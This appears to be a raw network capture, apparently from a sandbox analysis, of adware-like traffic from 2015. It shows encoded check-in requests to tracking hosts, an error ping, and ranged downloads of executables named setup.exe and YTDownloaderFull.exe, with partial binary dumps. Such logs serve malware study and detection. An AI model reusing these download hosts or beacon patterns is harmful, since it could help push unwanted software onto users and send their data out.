Host: yk9s88xsxo-zxis6jz8.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=QgW8pN5r26byj2QAAnEFBM30ehTmVX1mQBD1m2L769FXGmhmyGgv7qkO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: yk9s88xsxo-zxis6jz8.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=QgW8pN5r26byj2QAAnEFBM30ehTmVX1mQBD1m2L769FXGmhmyGgv7qkO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: yk9s88xsxo-zxis6jz8.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk..



GET /utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=18514 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:21 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /app/ping.ashx?e=j7YMo/n29XPJd3Cl8WpRrt5jOExRmJjcO2zR9ArYI84icvsFwQStENB87jgWTbK/3s5q cLFxyxYWD4MTU1ewbPSKLqmmOmOblFuMGpJvGKIJGNp/ 1I9GCArG4HtKvdX1gPBPGd4Gf2NRySioDRRk/1J3P8veFvLH4IoLPLWWwmPRXV7cLSOcTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5JDr9I5ZW0pTpBU9U/r/dsNyvhlGeipNVQ6A hJB6uhJAw85hRFS7YMmYLvqrm5 34uZ/p4emFS3nW9YwSk5gj28Va7JmIs/Bl13yhrpfYAMeIGfrzyWRyvy2gKbXyPPDXUoXAX2Uiz3W6sPFKrniC4jaKTJ4Po/  HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:33 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=Ka qOJkckoXHjWHokC5IQKgWR 5S3q5q62ls PLHCLDT03ZwnpMmrnnHkVEbFY2mhwr4VlWkO0yul9pd4H5jC6/NyPZdyyiin/GGy8byFgpgKkdlz1lRoYK03JXbbVmAY0ZRB54QLU9s0DpOFQBDKtJMHu88K1rwaE3O18WF9F0d212AYeRmsjiTgabm 9KyTurUOoOhKHAWZuVwyMddF6Z1N9JE36WiiCgXFJE54ba3yZbyqF02 D1Q ijBQ9I1GFvOpVsOwzzvGXsyNILdq6t9GbH/wnaf3AtLPqBYAg4fnTdJhi/F jqL/OPRls1am988pbBE198Bbak1i16fYytqnU4k0fribeIhZIOGE9621TzruYcSjl gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFDMWtlnh6ykf3xLsYR5HcB6c2C4KGeMVjZ4jzc3YjAmYShy1QgM mULHn4xNjI6qV1hbcceYGEhwEchBIBSL pnq6LeO//ew/cRstaZMh7oc9Jm6LOUplLi9UaJ0lDNBvBxfXneO6iyXLvPTXiM8YeL1JXfzjhvHW HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:33 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=WL9usJOVMsPXmto/P2xI1pGfa3o7qc5t56XqnYmheUgSZTerw9Y85dVUaX7QH4byIYSfA6BN7OBJ4GPHeEFvMkF5ezSia8QQf4SJJgI1sB24ZvM W8i8tdtgpjL3X7N9nl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsk7q1DqDoShwFmblcMjHXRdicB7EPPnRdH5TN3b4ooc0d6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:34 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2VX2gru9mb3lVEZbv3odR7drnS7dfKKClSmRgGcjsyyBKl4uaJsEWT1rk4Satsm2USSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJJI2sziJUfUjYt3Zg/aKemGVSvOHNjNGnWk7S5mNvBaWXs3H/bXdU0ToldukDzx1llVhPQP8X9sNG9pOkZ/PfGFwkoLVF6jef2zYWz6DzTPSToKv2VpIXZetFtmcGfLS6G/eITPVk2cBiFIt/eCwnOFhZWN4UpKuAnAhg 6mBvfU= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:35 GMT
Content-Length: 0



GET /web/gf/all/setup.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433409"
Last-Modified: Thu, 13 Aug 2015 02:36:49 GMT
Cache-Control: max-age=1220
Content-Length: 216576
Content-Range: bytes 0-216575/216576
Content-Type: application/x-msdownload
X-HW: 1439464705.dop001.am4.t,1439464704.cds055.am4.c
Content-Disposition: attachment; filename="setup.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1.S.u}=.u}=.
u}=.|...p}=.u}<.|}=.x/..t}=.x/..t}=.Richu}=........................
.PE..L...rt.T..................................... ....@..............
............0..............................................` ..<...
......................................................................
........... ..,............................text...[...................
........ ..`.rdata..n.... ......................@..@..................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U.........E........E
.....E..}.....}......k.....`......h......`...Pj.... @.j.h....j.j.j.h..
.@hR @.... @..E...., @..M..U.....U..N @..E.j.h....j.j.j.h......`...Q..
. @..E.j.j..U.R.E.P... @..E......E........M.....M..U.;U.}Mj..E.Pj..M.Q
.U.R... @..E.%....y.H...@.... @...U.3..U.j..E.Pj..M.Q.U.R... @....E.P.
.. @.j.j.... @.PhR @.j.j...$ @.j.... @.3...]..........................
......................................................................
..................................................................
<<< skipped >>>


GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 250000-499999/7202623
;....-P.,.v#\5..9..{.9P..Wv..%...d....@.[...y........>.P...>....
.f....L^...M...4....%.F,..u......./*My.ExPW.S..X2.o!}j.|fw..c..Uq...Vl
.k.!......U8..\B.......]....H.5..e..t.....W!..D...4.cV$(V.i."JT...N.De
0.2.......n&`W.6j_.06.... ..0..C..5s.n!B....9...Wt.F.....\1./..(~.X...
3}.a...CHB... ..Rn<1...{...N."ZGE....FkZ.M.[.E....67.z.......*M..1.
...J. ..6lUt....P..s!....C..29C.Zl...GKz.yK.c..".(..M.l...D<..f....
..[i...c...%G.\.,R..8h..-.....k.f......7.]".#.....!(....F....H*..At.&l
t;U)......>..R....$..d^......Me..0.J..5.t.a.W....0<.m......[...^
........5x.<.`(#|Rb*..........6r..A..&J.........]...u...E..5..:....
.e/!..A...p6.V.:....5..XWaz.......*J{.......p5k.D..p...n..a.= d..6..P.
&..l.H.{.*}ICl.9}..IVC<.. .K=E.#r ...:n.p...f..;<...Rk.Tz.#.oD(X
....{.).\.b..".j...Qd,.i.."{......gw4..`.N...0-...H....Q.......R...`.T
X.C...&h....c.S.dA........P....N..06..w=b......o.......N.`.L...:..*.p.
...P...1N.h.....dE..z..=e..F...>"sv}].r..O6w.\@..y..k._.$ms......9.
=e.z....=....#%..`O'C3%Z..:..'..*..g5.'...*.Km.o.....pY......X.m2..9/.
..-.8.O..y..e..%...;y...(...X....NwEd../...;#.z*.|:G.l.._8..R..B(G.8. 
n...uo&....H......J..'y.....^..q;....E.......M.i....Y...........r\7..4
....E@.%g...J..)d.bN|..#b.$.z.Y..*.....P...2.:U.......>T...Y..W..V.
......r...`......S&/_U^V.cz9.#.;...A_.Q..h.AX....Je..eI.9.W....s.hK.{.
0,...p3.....0.k.Zhp..#.%...(...[f....{v=.}wf..Z..X^...WsZJ.U.......T..
d.\..J..s\2.zo.=.:U.......C...y.}.$..P&f..Y/[......hR.y.=)G.9K.E1..R.4
..<..5...}.PP.......7t.._8%U..}h-....r.1.j.6......%S...d.'."&.U
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 750000-999999/7202623
.....`.[3.F2H...j.1...IeE...........C9P.../...j.F..'-..8....).a.{dT.Q&
W._b`;N.>.Ff...U1.B6o...<...57..........O1....p.x.t..L.*;/..t...
>......f&[.......(....]...s.,H.>C...q?..#[email protected]
......V...$.../>(}.7S..Co.N.......~B.3z...v.........q.*....n..LQ..3
?..Te...yqj.J...w....Zj.%..Td...I...8yx.b.....ho...z..c79.b.......h...
..VO.I...69.YQ..ny?K.l.'{....:{.."....d<...v.q..I...h.|[v..~.......
X..a.2.5....@.. .W..-u?..v..F.....u.....P..a....ak.. _..r.RS.O.4...U..
...^..p......Xv>c."..U:qi...:..V_[[email protected]....,e.V
................^....,(..Ss.?.c.......$...w.f....[.W.......e.%f`n.j..(
..o......O........MR.H.P...\.3adt..S.&co.y..l.=....z....r.....g...2I.@
..8.yy.K.u..T...Wf.;}...P*.....S..k....w.O.U....'........w|.....Lq.."n
....*....... .#......S......55 .Cd..d7..e..:.aL.r...g.%P..Xj..,....<
;..,YA.G....n6-h|...LH.N.bm....@...%.j7...z.#u.IEu.S.....#flk..3....l6
.:.iX:!.}...Y4.o..V...9..../:x.(..l.K..<.tVF..PD$....s.E. G........
H...............fM..J.|.P......|m...Jra..o|z....8.M.0..........0F...&g
t;..6._....H...i._..k.&.V.`MK.|...'=...b.&..eO.r..97.......V...BfM..e 
g.J&c.~.A.4.H..d.f.j.Z.. .........^rvkD.1....._.C?c_.4V....f.7....oB..
..l....q|}eyrD*.P..j.i.qH.....M[:...v...Y.L...h.$R...? 4.....BM.C..7..
^...:b...k.b).{..1.....=?C...V._..o.....5.....b.=.].d.V[o....B...N...V
.d./.zr....C.......3.x..t.#.......M&..Y...Z....Q..bM...;6. :;x.u.t..:.
}.^".....j...7,*B......:Q2..sj..(#.^...r...J....s...-..UX..O...I..}...
_.J.cs...c...['y..).B.]..5.-.......>k.Y.n[..!B......d...u{..5wa
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1250000-1499999/7202623
*GaS........V"3f.\.:"...o._.,y....?.!. .U.......CA.F^....%.cx.....:...
.\..l..8...6...A....,..KS?Q....{...E..:.h<.)...........G.>m.....
(.)K..G.x.B. .#....._#..j4...}..:\....@...].B#.G....X/.M...*..Xz._h.&g
t;@..f?.........VQ....W_.H....(..>L.$..~G...>v.B...."rY..O...9..
..Q.(K..R.|.vk..ck.........g.M.i2[T.R.i...]B......../..c...2....JO2.)3
<._.....LG.l...e. 8.2.............1.'....v.^.W.^..7..J.Y..3T....EEn
7........~..q.;.....s..*_.^.YK.Q.?...8...v.RFx&.....49.S.(.y.j....z7.5
.h........Z..8t;..B.G...f...TEJ0n/$..C]na...8yW..RX......z6......T..7q
...........h........G..g.f..,K.N..K.....H.\.=......D..,.7.1....R4C....
0J.q..cJ....g..9..[..r....6......tTB.. ...O...z..._..c.....'_...m.!.7z
=.....8G...<..n.\'.5#.&~...."SO;%.p|2................O|.7OO.....\.X
.......y.[7..Ng ......d... ..d.n..l..)......6.........;4.GU@.......]..
..........B.. j7...sl.^C.4J.l....$bE.......C.9.\>..........y.-....%
J........i6."....Q.j.n..)[email protected]..;e.._[.&..e#^.-O..oW.E...kI..!..l}-
."\{..-Y\.{...6z?.8.P..ew..A....%f_Z.xg.6`k.<..`dy.....&.l.F."|.ek.
....m......e.DR..r!%.b..A.?N.qv..............6.W'.o..J.c....K..B..j...
.5;p...B../.....D{.?...a8. .J.\.O.T.CYdT.............aM|[email protected])...
h..].......[RQ.C........:.g.....t@.^.....%};P.@.:.<t.....k9.8..G...
....Z......L..-.e.a...|.C... ....y...|ju..%.......z...a.R#v.0.t).C:z..
..h......z~f..hVG......r.......y\8<S{.:....y....^..(.5..4.>..}..
[email protected]|] ....J..."[email protected]..............
..H.L.......m.....T..5.......$9#..:4_?..73.......e.U...1.9.H}.Qo3p
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1750000-1999999/7202623
...E..t...0...5:j......(.).i.(..4}.. .B.E.IM.G..X...;O...A............
k<..Q...C....:.B...>Eyl.~.R.......x...7V.\C.....c...4.......s..t
5.Y/.x18O...K....q..TFpS.5.K?..r.Y....n,>.U.Y...y..T.WAi......A(...
h.... ....qYt...s1.]@.U..a....1.....&..1k^....[h<gI.....a..$..v....
.)..B../Bj.__Vq.9.."...$.1..,.;.M0\H...b-...Pd.t-~t.c.82.[b{}.l4......
..8."..6.u.>.....Z...xoQ..I........ .V .0.;t..m.....:).....N.b0.{g.
M.|.....0-.}.P...b..P..$x........./C.@Y...{5........wF..w......95;....
...c..2..U"...2?#..'.........7<.E.c...w..........L....N..Cxi.t.....
.e....h......)...t;.os..b.X..m5.........Z.J......v....'^3...%.. zXS.=p
,.`..^.5..O....H#..Q.O.....C.XjPP......E.7.)H.>..,....`...W...LN..{
?.n.*...l/..ai.U.W.o.....$z.[.o.vk.b?-b. ..;..!.;....=-.H....w......(.
...5.....;A<../.....l.V.judy....3.A..}.."..Iy.......S.V........F...
.H._eN.:......p......._.......!.E72.........1...L..b.=...WN.s......M.4
.........Ip.ICrk.;....."......iX.[._.b......~..H..d.....7.;.J~..w.Qx;.
D...V..g.[....$.V.].q..4~....zq]sT.n.......M.sb.A..BT{.|....].....4...
... .,.."....o.Q.\fN...1.I.-...f8..^...s~=.C..... ..[1..x^.....-T*...6
.......X*.$X:...t:...$..........s.Mj8-U.y...i|0.<.....~...a..y...{ 
_p5\...0.(...CvX.S.?.0y.:.W.-..i.2:.(syG...t.n . .2.=;.V...D....9&$...
..;N.,........LvQKc....?....P2.w...t^... vq.R.... P....{E...?...:..=*.
%....'.....bER.?....*H..#[email protected][email protected].{..&
gt;.".K.4=.g..w..t_..\.Y.e....%...I`..t.4"O`I.X>2...AP.m..c...r..&l
t;...G ..;(v.KK..6...T.#... ...y.S..tb.Q....{..t...q...w..?...g...
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2750000-2999999/7202623
..|.o........_:[email protected]$..y.l'...?..N...o...Yv.o!n..xGA.....4.....Z.8
.5."./[email protected].>.?..TI.......e&0.$......... ...}c...d...
.\...^...g.jc.b`.....[Vx..#.H.A"..p/N ..!....,..S.O.....0........%..bO
K..:.......8 j.R.s..`.B...C....|..4L@6>.........9.......v@.,.......
.....p1n.....R..Y...b>t.....^.....$=%..p.8!n)..S.6.w..i.E.....Js7./
<v.>C..A......p.].x....;.........</.`.s.....Q`..{.........g&g
t;....Eb........2....Z.4..L.....'/.....i....].%d...a'.XXh)?..dBb.XM...
.......7.:o.L.r.#.........C..........:..LP...4u.W/.V..p."x. ][email protected].
.e0..>.S../..4.......s........I.W&...>.........f........T:..L..P
.6...#^2..".>n.(.e'.80K....&.Ga..,..?....x..h.z$.T.] b....L..7.kQ..
..T~S....e...H....X.M..F.....e..".;.r.(J.nZ.O..n...]....t...sl....A?..
t..(R.y.=..?.........M....kw.5. \C..`4o.e...^.r...>r./..B...$....W5
.....GdZ........'....4."nq......K.{o;.x..M..XKq.H...N.N.C[.2...u..q..i
..ddkk..V..B..z.L..&....u..9m.sNiu.....a..O.#.W...hw..Bj6.J.1l..e.G4..
C.7~g..=..Bg.E.J......\.\N..iE...#.bFd.9..:.......' .Db......]R....EV~
*...5.......^...V.....7..2.,ye.....:. ...~e.d.2...vA.........m.:....._
....Qo..C/....G?.9A....|.....1..?:..........=......4S...33......KX..kL
s*...H..-...n....U.........".57.......O).7....k.....)D...)r..#1..fy.*.
.O ..N....#.PP.j..'G..V....%I.'...H...-..~.1E'.....n.?/."..<%..V...
.i....N.....cR.(..,.A...]..._....91.oJ._..........y.J3."..AZ}.W..e..?.
..SA.....e...=:.B>..y...3S.........V$#d.fk...g..dK.o ..f..g.,<.c
P...v..}3.w.._.P.XzX1.n..[........,y;1....`.`....u.m.S.._.... ))12
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=3250000-3499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3250000-3499999/7202623
.P../.._l0<...&..=?.....J.T....T..8.p.1~q.}.pY][email protected]..._.|$
 ..`..W.-...ul.........}........:.h..(.t1.x>@[email protected].^..
.R..._.q~.4.C..ri..g......^[email protected](.&...S....~...Q.....
(lt]...B..?......o......^.-:.ne..h..|......K..J....^...%Du.<,...P.Y
.....l5J..#5\.4- .,.p...U...4..|.h.d#...h..k....L.WhK. Y i..R..J..<
..T......g.$L.3.x..b4%.MS&op...O..[...C^..Zr..8............hw..8k..:..
..M...P.. ...=..T......bS>/..#|.I..e..=-U.....Q.f.EqFW1.'..-..@....
.~x..../...B...QtM8.K..W5....Xm.xx.r.a.)..E......H.P.87...F...%b.p~p.3
...h..P..q/.W.j.....j.&.i..:.RY.#./.....B&...`.....C..../RGf;.|....(..
..E.=.(,e.r......[h..~.ss.W.SP...9`.}[email protected].
4..........W......ES...... i.*lP......Z1..l.....n.u.Lb...)rU/..s.....k
[.\..$|-.4..^.s?.....[......Au....<..o.V. ....%.2d....>.Pgn6.A./
:..:...$.M.p)..N..1......A.j..ib....).]=P.e|...P9...sE5..:l._s..U&.C..
..a.H.v~....{...Um..F.P..4.........K.....,...,&.@...%.H1.z......a~E.mC
......0x...n.gi.'.N....j...g....).....2.=(.....[b.....n@}....*....D:..
[email protected].......*..K. .b...b..............MF.......$x.f[[email protected].
.`...&..m...W..c...9.Q...i...?....................t....~...Q..yw:...1.
.(..............e`%. ,.=^....l8.P."I*.m^w....na L.L.......b.j.]..`z...
..t.%;K...5.*>P.Q........U..Y........[7A........`(.~Y.......D......
. .....t....m/..1......ud....-&B...d..6..G.f..|.Q#......~.3...!a...oY|
e.;.a..Q; .G...y(....).....26..K.\w(...E ..M'..%uw..q...-...d`o2...Y.y
PJQ.....n...U_.F'......Y.....Y.zgH R}v*..K...n..4....a..9RL.P"s.7L
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=3750000-3999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3750000-3999999/7202623
.!.........4...!_.Uja.(..QL$...)y...,....E..;..u.[.vV .4.n......_...Q.
K....KI.`.;5.;.<.M]/...G..tG..H.]..<&.B/...u.....`...TRJ.*......
..m& [email protected].&#;""7.i.Q.o..A..T..r5.=;...b....&$.....
.h...D}...Dw...%....?~.0Ls9..<..t.b~.&.5..c$...1@e....[<....{]..
[email protected].`..@.`g.j]....6..e*..'u.g..{_qt..m....F.4...:...... ...y
.-.e...g.......l..&-..'.8e{l3.T.K..R.xW=....<[email protected]*>..,.A'
..<N>I ...`.x.......j,....A.H.|.8...<..|..j..=...4....dy.....
j|..D..fWQ...m!5..T.-.7......J6oD....."E.?.. .I.........:9.D...H4..#T\
...i...(....*&.3.e..............N../g..o66f......... ..oY. .H.c.d.....
I~....,k...5...i..L....... ...>i<..\.C... -...@A.......%)...]...
.._w2.UaN.F.q..(..[.m!.....e...41..}.:.l...OW.V...]....4..p..X,....<
;.w.......g.]......=y6}.o..;...<......q..!$<N..... }........RbA.
...R(.*.mo..O.......(.....FEN.C.z.}..p..9...\@.h...T.j....5.qsH.......
.;0.uo#..u..../tZ{.z......h.6.2._s.H!.,..sD...^.A,.A=..)8..B..T...:v..
#f=]/..x.(.....i.DJd.H?.J...avN...D.r.Zj}ZsHnbT......Zf.H[..F.C..3....
..O.?}Y.0pVH....D.'.S..\.....Y....d........a..]969.Q....F..S..?.^{...;
.4..6.._....|q..L#..].[\!O4.,.;...<.#..T4...... ~.......D..\.8-....
u.S&..(.N.2...8.$8c......W.W....H...jc......i.n......#L.....IO.....QQ/
.b..]S.T'..(..W.......d...=u..J...US...`0..u...h.G. ..gV~C..|.bi.8]M..
TN..o. J......cC..!...I.[.Y.t"!..?.....G..........b.X.fjPR......lU4?ik
=jD..q#e\..(0.X....g.T:.S..N..0ju./..z..S.n....{....[.7..wl.........q.
Y9be6...02...._Hk`..d.....&.z..... r...|.Dii........pSAT?.(.g..x].
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=4250000-4499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4250000-4499999/7202623
;7..M......8..._..}...uSJV.$._....lj.YW...A...vV.dj.FDKj..#.V.. .0....
.x.9..oz..........!..H.o.)......L....-.]....l..I...o~...x.......m./...
..w...LV...j.Eu.:s.Ft\.S..;@GZ........`.!rY........M......e../.CuO.T..
$72.G.@...!".... ... #z.F.......(=.j,.. [email protected]..&0.......
o'.\.3..J.....c..gtb...W...P.ET......n..c.Q.T.e.....m.'...2.........r.
.,..47.....]@.*k..B....l^..*Ck}........ad..)....t-6./g.X....u...l\....
...,...j..nl..Mt....FO4.._pn;.."4<.._..v........R.-...y(..'.eb...4.
|.........zAVR..S6na,;p$....@V.....``0..D'...(....(. F*...>....m-.N
g.....l......x..../.....TE=......D...c.)G!{..e...-.2....j. .e....g.F..
f.g........:j.{.Q.8..?T.Iu.Jf.(?....q.....oE.....l/.$..N.A..}.ak6.....
...Z.K.ML4..T.........i.Lr........_.KMm.....H.y.,&.....1.2.C........kw
.9...........8 fi<!......J.....=:.KbK.6.a.&...z...*.>h3..F.r..;.
,........5...F?....P.......q.3.l.8...yQ_i9*.....i..i........`...%.3"..
